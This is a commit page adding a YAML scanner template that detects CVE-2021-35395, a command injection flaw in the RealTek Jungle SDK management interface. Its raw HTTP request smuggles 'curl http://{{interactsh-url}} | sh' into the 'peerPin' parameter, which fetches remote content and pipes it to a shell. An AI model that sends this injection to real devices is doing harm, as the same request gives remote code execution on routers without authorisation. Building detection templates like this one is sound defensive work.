Skip to content

Commit 5416d4c

Browse files
Create CVE-2021-35395 template
1 parent d5563a2 commit 5416d4c

File tree

1 file changed

+25
-0
lines changed

1 file changed

+25
-0
lines changed

http/cves/2021/CVE-2021-35395.yaml

Lines changed: 25 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,25 @@
1+
id: CVE-2021-35395
2+
info:
3+
name: RealTek Jungle SDK - Arbitrary Command Injection
4+
author: king-alexander
5+
severity: critical
6+
description: There is a command injection vulnerability on the "formWsc" page of the management interface.
7+
reference:
8+
- https://nvd.nist.gov/vuln/detail/CVE-2021-35395
9+
- https://blogs.juniper.net/en-us/threat-research/attacks-continue-against-realtek-vulnerabilities
10+
tags: cve,kev
11+
12+
http:
13+
- raw:
14+
- |
15+
POST /goform/formWsc HTTP/1.1
16+
Host: {{Hostname}}
17+
Content-Type: application/x-www-form-urlencoded
18+
# The 'peerPin' parameter is unsanitized. So we can inject arbitrary commands after the statement that uses the 'peerPin' value.
19+
submit-url=%2Fwlwps.asp&resetUnCfg=0&peerPin=12345678;curl http://{{interactsh-url}} | sh;&setPIN=Start+PIN&configVxd=off&resetRptUnCfg=0&peerRptPin=
20+
21+
matchers:
22+
- type: word
23+
part: interactsh_protocol
24+
words:
25+
- "http"

0 commit comments

Comments
 (0)